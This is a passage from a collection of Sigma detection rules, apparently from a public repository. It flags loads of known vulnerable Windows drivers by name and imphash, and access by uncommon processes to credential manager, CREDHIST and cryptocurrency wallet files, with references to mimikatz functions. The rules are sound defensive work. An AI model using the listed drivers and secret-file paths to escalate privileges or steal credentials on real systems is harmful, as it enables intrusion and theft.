'IMPHASH=95fe5e937e5acf9bea948fe0256e46ae'\n            - 'IMPHASH=fc789f89340a45f1ab6c49e61b1f6b40'\n            - 'IMPHASH=b8d0a36d2b14d79dfa08fb2e121f0920'\n            - 'IMPHASH=6ce93eab57a73915ecd5c202a339f6ce'\n            - 'IMPHASH=59b168c8ba0db46cb70d1d5a103e6c41'\n            - 'IMPHASH=3edc60bda68569cac7ad7604728ff40d'\n            - 'IMPHASH=3e8e7e5e779c7064e6bab177167e9e7a'\n            - 'IMPHASH=b05ee5c816a30bc52378c759486af0b9'\n            - 'IMPHASH=f7d07bcaa23837d219dcb64e76290252'\n            - 'IMPHASH=d658b06ec1ce39670b02a2dd83e29d03'\n            - 'IMPHASH=11bfcbdb0787ef461d442f973c392cf6'\n            - 'IMPHASH=f531646e31cc12dfaac5b8352653c384'\n            - 'IMPHASH=9b3ad85a76080f989d24cd89da90175a'\n            - 'IMPHASH=5f6fd4ffba177389f414dd1a6ded24b4'\n            - 'IMPHASH=4b0b017b23567cf8b9e1268957acd032'\n            - 'IMPHASH=b4a71a1265f5f82cf383af17e229acb5'\n            - 'IMPHASH=0ebf1214948a636eba076b14cd8f72d5'\n            - 'IMPHASH=c05e71aad32edcbe71ae0ef1621f8693'\n            - 'IMPHASH=427cd9c70cca88ca1db61a5ddc3b8450'\n            - 'IMPHASH=236bc37dff7a92a4d25d807cf038e674'\n            - 'IMPHASH=e38cca61999fb8a0308c0eb798b07989'\n            - 'IMPHASH=3815f9107b799b863cd905178e6e07d0'\n            - 'IMPHASH=3c91d549b68e320924bcde3856993e87'\n            - 'IMPHASH=bb56f25a810b329868a0ff8e94080bad'\n            - 'IMPHASH=f5030145594c486434040aa2636a5dde'\n            - 'IMPHASH=d8101af81fd826b492ced1994ebd3268'\n            - 'IMPHASH=b5967a61e1a4e1d57b3d8ffefc5721ed'\n            - 'IMPHASH=799c9c020c6fcfd11a4172bc861f74af'\n            - 'IMPHASH=2b9471e7bb8c05dc55d0a2ff0591ea98'\n            - 'IMPHASH=6a47c957830ccce7ef43ed96aacf7c2c'\n            - 'IMPHASH=b1e749ba779687a5127817da3d47af2c'\n            - 'IMPHASH=202a0f2f992ec379e2876776ae9de661'\n            - 'IMPHASH=f5df2479285c7b593b3630b8357032e3'\n            - 'IMPHASH=32204eaf2afa5b348ab17de07362885c'\n            - 
'IMPHASH=1de2e6e58f6b19c4ec9ad6ca9fce5c14'\n            - 'IMPHASH=64d934652c680b7759f6e75d05ee3072'\n            - 'IMPHASH=176d8e75a27a45e2c6f5d4cceca4d869'\n            - 'IMPHASH=f0820e8f674e44e5c2a3f899ec561c1d'\n            - 'IMPHASH=f4fa225abfb5a5263241a01a2c3f2b8f'\n            - 'IMPHASH=a18b467c3b43f334ca455c495a3ef70d'\n            - 'IMPHASH=a8633e68c2ad9f3dc83775d8d5b21c5b'\n            - 'IMPHASH=9d5a58052468c8e07ff3d5bd730e5d00'\n            - 'IMPHASH=69260cce3156aa2dc0540fb78f5fe826'\n            - 'IMPHASH=b1336b0cb67918ed39f1f88c354910d0'\n            - 'IMPHASH=f119bff607049d431d0968fbaf6532f3'\n            - 'IMPHASH=c91146dfe120f6e8fbed2150d9e020ca'\n            - 'IMPHASH=1e6875beefe8571686d3e8530f8c4bfb'\n            - 'IMPHASH=acdf419d1d03923be256205b9c33eec8'\n            - 'IMPHASH=756adaea6a3f9f0cdaff73d1a49ca201'\n            - 'IMPHASH=28dc68bb6d6bf4f6b2db8dd7588b2511'\n            - 'IMPHASH=6e7cd05c0da9f82449a8b3795418ee00'\n            - 'IMPHASH=8c3af6c25ab40c4daefb4f836d12e1c8'\n            - 'IMPHASH=4792bcb395d06f9efb72e8020c4af5e6'\n            - 'IMPHASH=d5bc15465b63888cc8b98ecc63a81517'\n            - 'IMPHASH=7f53340c91c108efedb5b8678c5207b3'\n            - 'IMPHASH=3f4a90b2976641ad2c0164792b24d322'\n            - 'IMPHASH=d221afaadf43ceedb581e665435c56c7'\n            - 'IMPHASH=f212bbc758bb52fc661839b1d194b76e'\n            - 'IMPHASH=e938b727f5a033818337f7ba0584500f'\n            - 'IMPHASH=3ac083b0ee2b752436a8a1532179f032'\n            - 'IMPHASH=2e9ef79ea88178e29516dfa435a58900'\n            - 'IMPHASH=24c3d3be20e794c17844d030be03fd2f'\n            - 'IMPHASH=700a9350ac8b218ab9fc62cf25337ad3'\n            - 'IMPHASH=e586fd1c5af87b43696b9d29b09bf1b1'\n            - 'IMPHASH=2233472cee6457ad207017803048aaff'\n            - 'IMPHASH=f046e37fa7914491dc25a6f7718da341'\n            - 'IMPHASH=683bc425e3d8c21f9473a238a0645a4e'\n            - 'IMPHASH=f08e2ac6ca73cd2a924ed25dc6813638'\n            - 
'IMPHASH=e2306e26abfd90a5ce4dad0e266b3905'\n            - 'IMPHASH=10917aa77669c6ae714f074d89be9ab8'\n            - 'IMPHASH=db62897eb9d2098e988f830159c04c82'\n            - 'IMPHASH=51780bba04121d6be13f69de08721445'\n            - 'IMPHASH=29a2e15ac1622a3daf7da5a78f0cef08'\n            - 'IMPHASH=5988ec9f159fefbdf89d893aa634dd92'\n            - 'IMPHASH=05d3de62beab8e88de1dafd3b24a16f6'\n            - 'IMPHASH=88380fdfc880da4da407c38f34fe8a3c'\n            - 'IMPHASH=8a424cd36ae3eab0d11332ce3b982a02'\n            - 'IMPHASH=60a2fba979aaa0d0ccd09c12ca3d9e57'\n            - 'IMPHASH=85f86c7c8ce81a78e84efa545d7edc65'\n            - 'IMPHASH=9523103b30fb194643b97ccc3ab7abb0'\n            - 'IMPHASH=0c2219c9c5eab786fa876f74356eea20'\n            - 'IMPHASH=7abb0911ca4cc4697ee1e9897932d3ac'\n            - 'IMPHASH=c6a0f65ba653ee78255cc9e314abc442'\n            - 'IMPHASH=44e6f2f64092b48f8eb926c36ebd1d56'\n            - 'IMPHASH=13300d56528646611f26704266713952'\n            - 'IMPHASH=095c0cdb9c0421da216371c1f4e8790e'\n            - 'IMPHASH=45f8f347e3fb919f3164a4a3278f1c71'\n            - 'IMPHASH=0e4f5481813eeec4e5dd96e36020135f'\n            - 'IMPHASH=1d05fb30a58133da2e9dbdfcf51b80fd'\n            - 'IMPHASH=2561727ac42d399030b3c46477c428f4'\n            - 'IMPHASH=be69e763a6a858c3e7e1ea6e3af12691'\n            - 'IMPHASH=7fba20994f76fb31b9f5a2b3f0c00055'\n            - 'IMPHASH=1d9cdf46ff335712634c292180c06755'\n            - 'IMPHASH=ad4586d21c9469bf636b5e8660e9d702'\n            - 'IMPHASH=958dd67f866ae27cf716e30a025b266f'\n            - 'IMPHASH=1dd3b83f2b007f862a1d8de4a1d3303f'\n            - 'IMPHASH=b4c562c2c654abd2cc71658646314976'\n            - 'IMPHASH=679eba16ab2d51543b7007708838ef7c'\n            - 'IMPHASH=a1603fe7f02448c6b33687ddb9304c7f'\n            - 'IMPHASH=9e2cf28fe320bbf74972509536569c8e'\n            - 'IMPHASH=f233a65b937c69b447824889fb7425ff'\n            - 'IMPHASH=b3204707f6e489cd5a2484881eaf78ca'\n            - 
'IMPHASH=c61a46ffe79d3f7d6307c0d2ae5f391e'\n            - 'IMPHASH=28c5045218461018dbde27212ab0f227'\n            - 'IMPHASH=af34db96db910a3fa7a56f2fac8ed5e1'\n            - 'IMPHASH=e80eeed7225a880bbde0d038a5fe1af4'\n            - 'IMPHASH=62473b41d695f075ad96abc4a408de5b'\n            - 'IMPHASH=56307b5227183c002e4231320a72b961'\n            - 'IMPHASH=dd7c5c0c762169d40ee01280e4ac74fc'\n            - 'IMPHASH=9915439d37f385dbffc72bf835f3ee02'\n            - 'IMPHASH=4199ed50502e00f57d9b66e9305450f5'\n            - 'IMPHASH=71c580daf556775f690f0af3db12506f'\n            - 'IMPHASH=c1ab6741cd29de98a138f2bd639f620a'\n            - 'IMPHASH=32247962aa01af8ad5dca696260a05ab'\n            - 'IMPHASH=1d774a94ad511efe5ebfe70acc6f8c85'\n            - 'IMPHASH=690a0fb27a0c47c785d6bbbfc2e56501'\n            - 'IMPHASH=78727a5fac8bd281903014ee00dcd553'\n            - 'IMPHASH=f5ebade1d3a6d3bde264b0c7f9f639e7'\n            - 'IMPHASH=4343c9c0b78ee21e895f10d929c240d4'\n            - 'IMPHASH=f510a429c6ce5c8d414550518b3823d2'\n            - 'IMPHASH=45acfe4a83f61d872fb904a1f08ef991'\n            - 'IMPHASH=cbf26c6e8cf7e294bda273e7026a2789'\n            - 'IMPHASH=84d83741445d9f5a6717b874fed3d8f3'\n            - 'IMPHASH=0b40636205c64cacfd2e4f407518ad58'\n            - 'IMPHASH=b4627789883457d50964a248104cb4c2'\n            - 'IMPHASH=a7ff164c1ee5113a0a09e66b2cd03544'\n            - 'IMPHASH=a0a13575e37906924a0b79043b4005c6'\n            - 'IMPHASH=955e7b12a8fa06444c68e54026c45de1'\n            - 'IMPHASH=8f52e36711c80bb9d7e30995e0092e83'\n            - 'IMPHASH=05fbe4619edf747787879d9323951439'\n            - 'IMPHASH=865c945f842a3f5f5453fb90d12f6765'\n            - 'IMPHASH=89f925b54b95944513671d79eba5fe07'\n            - 'IMPHASH=f4c5b0399665885a7dd34f7cdbbc586f'\n            - 'IMPHASH=2ece23bdef16ee294bd905c7ba1be589'\n            - 'IMPHASH=e800cd3299d4cda0d9e02255acc3b7dd'\n            - 'IMPHASH=a86fb9a41955bda815ab902fb58baa27'\n            - 
'IMPHASH=485f7e86663d49c68c8b5f705d310f50'\n            - 'IMPHASH=5899e93373114ca9e458e906675132b7'\n            - 'IMPHASH=be2d638c3933fc3f5a96e539f9910c5f'\n            - 'IMPHASH=fbfa302bf7eb5d615d0968541ee49ce4'\n            - 'IMPHASH=f9b9487f25a2c1e08c02f391387c5323'\n            - 'IMPHASH=ef102e058f6b88af0d66d26236257706'\n            - 'IMPHASH=0f371a913e9fa3ba3a923718e489debb'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml",
    "content": "title: Vulnerable Driver Load By Name\nid: 72cd00d6-490c-4650-86ff-1d11f491daa1\nstatus: test\ndescription: Detects the load of known vulnerable drivers via the file name of the drivers.\nreferences:\n    - https://loldrivers.io/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-03\nmodified: 2023-12-02\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - attack.t1068\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\panmonfltx64.sys'\n            - '\\dbutil.sys'\n            - '\\fairplaykd.sys'\n            - '\\nvaudio.sys'\n            - '\\superbmc.sys'\n            - '\\bsmi.sys'\n            - '\\smarteio64.sys'\n            - '\\bwrsh.sys'\n            - '\\agent64.sys'\n            - '\\asmmap64.sys'\n            - '\\dellbios.sys'\n            - '\\chaos-rootkit.sys'\n            - '\\wcpu.sys'\n            - '\\dh_kernel.sys'\n            - '\\sbiosio64.sys'\n            - '\\bw.sys'\n            - '\\asrdrv102.sys'\n            - '\\nt6.sys'\n            - '\\mhyprot3.sys'\n            - '\\winio64c.sys'\n            - '\\asupio64.sys'\n            - '\\blackbonedrv10.sys'\n            - '\\d.sys'\n            - '\\driver7-x86.sys'\n            - '\\sfdrvx32.sys'\n            - '\\enetechio64.sys'\n            - '\\gdrv.sys'\n            - '\\sysinfodetectorx64.sys'\n            - '\\fh-ethercat_dio.sys'\n            - '\\asromgdrv.sys'\n            - '\\my.sys'\n            - '\\dcprotect.sys'\n            - '\\irec.sys'\n            - '\\gedevdrv.sys'\n            - '\\winio32a.sys'\n            - '\\gvcidrv64.sys'\n            - '\\winio32.sys'\n            - '\\bs_hwmio64.sys'\n            - '\\nstr.sys'\n            - '\\inpoutx64.sys'\n            - '\\hw.sys'\n            - '\\winio64.sys'\n            - '\\hpportiox64.sys'\n            - '\\iobitunlocker.sys'\n            - 
'\\b1.sys'\n            - '\\aoddriver.sys'\n            - '\\elbycdio.sys'\n            - '\\protects.sys'\n            - '\\kprocesshacker.sys'\n            - '\\speedfan.sys'\n            - '\\radhwmgr.sys'\n            - '\\iscflashx64.sys'\n            - '\\black.sys'\n            - '\\b4.sys'\n            - '\\hwos2ec10x64.sys'\n            - '\\winflash64.sys'\n            - '\\corsairllaccess64.sys'\n            - '\\bs_i2cio.sys'\n            - '\\d3.sys'\n            - '\\windows-xp-64.sys'\n            - '\\aswvmm.sys'\n            - '\\bs_i2c64.sys'\n            - '\\1.sys'\n            - '\\nchgbios2x64.sys'\n            - '\\cpuz141.sys'\n            - '\\segwindrvx64.sys'\n            - '\\tdeio64.sys'\n            - '\\ntiolib.sys'\n            - '\\gtckmdfbs.sys'\n            - '\\iomap64.sys'\n            - '\\avalueio.sys'\n            - '\\semav6msr.sys'\n            - '\\lgdcatcher.sys'\n            - '\\b.sys'\n            - '\\hwdetectng.sys'\n            - '\\nt4.sys'\n            - '\\tgsafe.sys'\n            - '\\mydrivers.sys'\n            - '\\eneio64.sys'\n            - '\\procexp.sys'\n            - '\\viragt64.sys'\n            - '\\fpcie2com.sys'\n            - '\\lenovodiagnosticsdriver.sys'\n            - '\\cp2x72c.sys'\n            - '\\kerneld.amd64'\n            - '\\bs_def64.sys'\n            - '\\piddrv.sys'\n            - '\\amifldrv64.sys'\n            - '\\cpuz_x64.sys'\n            - '\\proxy32.sys'\n            - '\\wsdkd.sys'\n            - '\\t8.sys'\n            - '\\ucorew64.sys'\n            - '\\atszio.sys'\n            - '\\lmiinfo.sys'\n            - '\\80.sys'\n            - '\\nt3.sys'\n            - '\\ngiodriver.sys'\n            - '\\lv561av.sys'\n            - '\\gpcidrv64.sys'\n            - '\\fd3b7234419fafc9bdd533f48896ed73_b816c5cd.sys'\n            - '\\rtport.sys'\n            - '\\full.sys'\n            - '\\viragt.sys'\n            - '\\fiddrv64.sys'\n            - '\\cupfixerx64.sys'\n            
- '\\cpupress.sys'\n            - '\\hwos2ec7x64.sys'\n            - '\\driver7-x86-withoutdbg.sys'\n            - '\\asrdrv10.sys'\n            - '\\nvflsh64.sys'\n            - '\\asrrapidstartdrv.sys'\n            - '\\tmcomm.sys'\n            - '\\wiseunlo.sys'\n            - '\\rwdrv.sys'\n            - '\\asio64.sys'\n            - '\\nvoclock.sys'\n            - '\\panio.sys'\n            - '\\mtcbsv64.sys'\n            - '\\amigendrv64.sys'\n            - '\\capcom.sys'\n            - '\\netflt.sys'\n            - '\\phlashnt.sys'\n            - '\\dbutil_2_3.sys'\n            - '\\ni.sys'\n            - '\\ntiolib_x64.sys'\n            - '\\atszio64.sys'\n            - '\\lgcoretemp.sys'\n            - '\\lha.sys'\n            - '\\phymem64.sys'\n            - '\\dbutildrv2.sys'\n            - '\\asrdrv103.sys'\n            - '\\rtcore64.sys'\n            - '\\bs_hwmio64_w10.sys'\n            - '\\ene.sys'\n            - '\\winio64b.sys'\n            - '\\piddrv64.sys'\n            - '\\directio32.sys'\n            - '\\monitor_win10_x64.sys'\n            - '\\nt5.sys'\n            - '\\asrsmartconnectdrv.sys'\n            - '\\rtif.sys'\n            - '\\atillk64.sys'\n            - '\\directio.sys'\n            - '\\asribdrv.sys'\n            - '\\kfeco11x64.sys'\n            - '\\citmdrv_ia64.sys'\n            - '\\sysdrv3s.sys'\n            - '\\amp.sys'\n            - '\\vboxdrv.sys'\n            - '\\adv64drv.sys'\n            - '\\hostnt.sys'\n            - '\\phymem_ext64.sys'\n            - '\\echo_driver.sys'\n            - '\\winiodrv.sys'\n            - '\\pdfwkrnl.sys'\n            - '\\glckio2.sys'\n            - '\\asrdrv106.sys'\n            - '\\nscm.sys'\n            - '\\bs_rcio64.sys'\n            - '\\ncpl.sys'\n            - '\\sandra.sys'\n            - '\\fiddrv.sys'\n            - '\\hwrwdrv.sys'\n            - '\\mhyprot.sys'\n            - '\\asrsetupdrv103.sys'\n            - '\\iqvw64.sys'\n            - '\\b3.sys'\n            
- '\\ssport.sys'\n            - '\\bs_def.sys'\n            - '\\computerz.sys'\n            - '\\windows8-10-32.sys'\n            - '\\nstrwsk.sys'\n            - '\\lurker.sys'\n            - '\\bsmemx64.sys'\n            - '\\wyproxy64.sys'\n            - '\\asio.sys'\n            - '\\t3.sys'\n            - '\\cpuz.sys'\n            - '\\rtkio.sys'\n            - '\\driver7-x64.sys'\n            - '\\netfilterdrv.sys'\n            - '\\ioaccess.sys'\n            - '\\testbone.sys'\n            - '\\gameink.sys'\n            - '\\kevp64.sys'\n            - '\\mhyprot2.sys'\n            - '\\se64a.sys'\n            - '\\vboxusb.sys'\n            - '\\windows7-32.sys'\n            - '\\vproeventmonitor.sys'\n            - '\\winio64a.sys'\n            - '\\asrdrv101.sys'\n            - '\\netproxydriver.sys'\n            - '\\elrawdsk.sys'\n            - '\\zam64.sys'\n            - '\\cg6kwin2k.sys'\n            - '\\asupio.sys'\n            - '\\stdcdrvws64.sys'\n            - '\\81.sys'\n            - '\\citmdrv_amd64.sys'\n            - '\\amdryzenmasterdriver.sys'\n            - '\\vmdrv.sys'\n            - '\\sysinfo.sys'\n            - '\\alsysio64.sys'\n            - '\\directio64.sys'\n            - '\\rzpnk.sys'\n            - '\\amdpowerprofiler.sys'\n            - '\\truesight.sys'\n            - '\\wirwadrv.sys'\n            - '\\phymemx64.sys'\n            - '\\msio64.sys'\n            - '\\sepdrv3_1.sys'\n            - '\\gametersafe.sys'\n            - '\\bs_rcio.sys'\n            - '\\d4.sys'\n            - '\\t.sys'\n            - '\\eio.sys'\n            - '\\nt2.sys'\n            - '\\winring0.sys'\n            - '\\physmem.sys'\n            - '\\libnicm.sys'\n            - '\\msio32.sys'\n            - '\\asrautochkupddrv.sys'\n            - '\\asio32.sys'\n            - '\\etdsupp.sys'\n            - '\\smep_namco.sys'\n            - '\\bandai.sys'\n            - '\\d2.sys'\n            - '\\magdrvamd64.sys'\n            - '\\nvflash.sys'\n   
         - '\\goad.sys'\n            - '\\proxy64.sys'\n            - '\\amsdk.sys'\n            - '\\kbdcap64.sys'\n            - '\\vdbsv64.sys'\n            - '\\pchunter.sys'\n            - '\\sysconp.sys'\n            - '\\dh_kernel_10.sys'\n            - '\\msrhook.sys'\n            - '\\bedaisy.sys'\n            - '\\dcr.sys'\n            - '\\panmonflt.sys'\n            - '\\bsmixp64.sys'\n            - '\\otipcibus.sys'\n            - '\\fidpcidrv.sys'\n            - '\\kfeco10x64.sys'\n            - '\\asrdrv104.sys'\n            - '\\c.sys'\n            - '\\tdklib64.sys'\n            - '\\bsmix64.sys'\n            - '\\bs_flash64.sys'\n            - '\\stdcdrv64.sys'\n            - '\\naldrv.sys'\n            - '\\ctiio64.sys'\n            - '\\bwrs.sys'\n            - '\\nicm.sys'\n            - '\\winio32b.sys'\n            - '\\paniox64.sys'\n            - '\\ecsiodriverx64.sys'\n            - '\\iomem64.sys'\n            - '\\fidpcidrv64.sys'\n            - '\\aswarpot.sys'\n            - '\\bs_rciow1064.sys'\n            - '\\asmio64.sys'\n            - '\\openlibsys.sys'\n            - '\\viraglt64.sys'\n            - '\\dbk64.sys'\n            - '\\t7.sys'\n            - '\\atlaccess.sys'\n            - '\\nbiolib_x64.sys'\n            - '\\smep_capcom.sys'\n            - '\\iqvw64e.sys'\n    condition: selection\nfalsepositives:\n    - False positives may occur if one of the vulnerable driver names mentioned above didn't change between versions. So always make sure that the driver being loaded is the legitimate one and the non-vulnerable version.\n    - If you experience a lot of FPs you could comment out the driver name or filter on its exact known legitimate location (when possible)\nlevel: low\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml",
    "content": "title: Vulnerable HackSys Extreme Vulnerable Driver Load\nid: 295c9289-acee-4503-a571-8eacaef36b28\nstatus: test\ndescription: Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors\nreferences:\n    - https://github.com/hacksysteam/HackSysExtremeVulnerableDriver\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-18\nmodified: 2024-11-23\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        - ImageLoaded|endswith: '\\HEVD.sys'\n        - Hashes|contains:\n              - 'IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5' # Version 3.0\n              - 'IMPHASH=c46ea2e651fd5f7f716c8867c6d13594' # Version 3.0\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml",
    "content": "title: Vulnerable WinRing0 Driver Load\nid: 1a42dfa6-6cb2-4df9-9b48-295be477e835\nstatus: test\ndescription: Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation\nreferences:\n    - https://github.com/xmrig/xmrig/tree/master/bin/WinRing0\n    - https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-26\nmodified: 2024-11-23\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        - Hashes|contains: 'IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7'\n        - ImageLoaded|endswith:\n              - '\\WinRing0x64.sys'\n              - '\\WinRing0.sys'\n              - '\\WinRing0.dll'\n              - '\\WinRing0x64.dll'\n              - '\\winring00x64.sys'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/driver_load/driver_load_win_windivert.yml",
    "content": "title: WinDivert Driver Load\nid: 679085d5-f427-4484-9f58-1dc30a7c426d\nstatus: test\ndescription: Detects the load of the WinDivert driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows\nreferences:\n    - https://reqrypt.org/windivert-doc.html\n    - https://rastamouse.me/ntlm-relaying-via-cobalt-strike/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-30\nmodified: 2024-11-23\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.defense-evasion\n    - attack.t1599.001\n    - attack.t1557.001\nlogsource:\n    category: driver_load\n    product: windows\ndetection:\n    selection:\n        - ImageLoaded|contains:\n              - '\\WinDivert.sys'\n              - '\\WinDivert64.sys'\n              # Other used names\n              - '\\NordDivert.sys'\n              - '\\lingtiwfp.sys'\n              - '\\eswfp.sys'\n        - Hashes|contains:\n              - 'IMPHASH=0604bb7cb4bb851e2168d5c7d9399087'\n              - 'IMPHASH=2e5f0e649d97f32b03c09e4686d0574f'\n              - 'IMPHASH=52f8aa269f69f0edad9e8fcdaedce276'\n              - 'IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76'\n              - 'IMPHASH=58623490691babe8330adc81cd04a663'\n              - 'IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b'\n              - 'IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96'\n              - 'IMPHASH=a1b2e245acd47e4a348e1a552a02859a'\n              - 'IMPHASH=2a5f85fe4609461c6339637594fa9b0a'\n              - 'IMPHASH=6b2c6f95233c2914d1d488ee27531acc'\n              - 'IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342'\n              - 'IMPHASH=d8a719865c448b1bd2ec241e46ac1c88'\n              - 'IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38'\n              - 'IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6'\n              - 'IMPHASH=a74929edfc3289895e3f2885278947ae'\n              - 'IMPHASH=a66b476c2d06c370f0a53b5537f2f11e'\n              - 'IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4'\n              - 
'IMPHASH=c28cd6ccd83179e79dac132a553693d9'\n    condition: selection\nfalsepositives:\n    - Legitimate WinDivert driver usage\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_access/file_access_win_susp_credential_manager_access.yml",
    "content": "title: Credential Manager Access By Uncommon Applications\nid: 407aecb1-e762-4acf-8c7b-d087bcff3bb6\nstatus: test\ndescription: |\n    Detects suspicious processes, based on name and location, that access the Windows credential manager and vault.\n    This can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\nreferences:\n    - https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-11\nmodified: 2024-07-29\ntags:\n    - attack.t1003\n    - attack.credential-access\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|contains:\n            - '\\AppData\\Local\\Microsoft\\Credentials\\'\n            - '\\AppData\\Roaming\\Microsoft\\Credentials\\'\n            - '\\AppData\\Local\\Microsoft\\Vault\\'\n            - '\\ProgramData\\Microsoft\\Vault\\'\n    filter_system_folders:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate software installed by the users, for example in the \"AppData\" directory, may access these files (for any reason).\n# Increase level after false positives filters are good enough\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_access/file_access_win_susp_credhist.yml",
    "content": "title: Access To Windows Credential History File By Uncommon Applications\nid: 7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2\nstatus: test\ndescription: |\n    Detects file access requests to the Windows Credential History File by an uncommon application.\n    This can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\nreferences:\n    - https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist\n    - https://www.passcape.com/windows_password_recovery_dpapi_credhist\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-17\nmodified: 2024-07-29\ntags:\n    - attack.credential-access\n    - attack.t1555.004\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|endswith: '\\Microsoft\\Protect\\CREDHIST'\n    filter_main_system_folders:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_main_explorer:\n        Image: 'C:\\Windows\\explorer.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\n# Increase level after false positives filters are good enough\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_access/file_access_win_susp_crypto_currency_wallets.yml",
    "content": "title: Access To Crypto Currency Wallets By Uncommon Applications\nid: f41b0311-44f9-44f0-816d-dd45e39d4bc8\nstatus: test\ndescription: |\n    Detects file access requests to crypto currency wallet files by uncommon processes.\n    Could indicate a potential attempt to steal crypto currency wallets.\nreferences:\n    - Internal Research\nauthor: X__Junior (Nextron Systems)\ndate: 2024-07-29\ntags:\n    - attack.t1003\n    - attack.credential-access\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        - FileName|contains:\n              - '\\AppData\\Roaming\\Ethereum\\keystore\\'\n              - '\\AppData\\Roaming\\EthereumClassic\\keystore\\'\n              - '\\AppData\\Roaming\\monero\\wallets\\'\n        - FileName|endswith:\n              - '\\AppData\\Roaming\\Bitcoin\\wallet.dat'\n              - '\\AppData\\Roaming\\BitcoinABC\\wallet.dat'\n              - '\\AppData\\Roaming\\BitcoinSV\\wallet.dat'\n              - '\\AppData\\Roaming\\DashCore\\wallet.dat'\n              - '\\AppData\\Roaming\\DogeCoin\\wallet.dat'\n              - '\\AppData\\Roaming\\Litecoin\\wallet.dat'\n              - '\\AppData\\Roaming\\Ripple\\wallet.dat'\n              - '\\AppData\\Roaming\\Zcash\\wallet.dat'\n    filter_main_system:\n        Image: System\n    filter_main_generic:\n        # This filter is added to avoid a large amount of FPs with 3rd party software. You should remove it in favour of specific filters per application\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_optional_defender:\n        Image|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n        Image|endswith:\n            - '\\MpCopyAccelerator.exe'\n            - '\\MsMpEng.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Antivirus, Anti-Spyware, Anti-Malware Software\n    - Backup software\n    - Legitimate software installed on partitions other than \"C:\\\"\n    - Searching software such as \"everything.exe\"\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_access/file_access_win_susp_dpapi_master_key_access.yml",
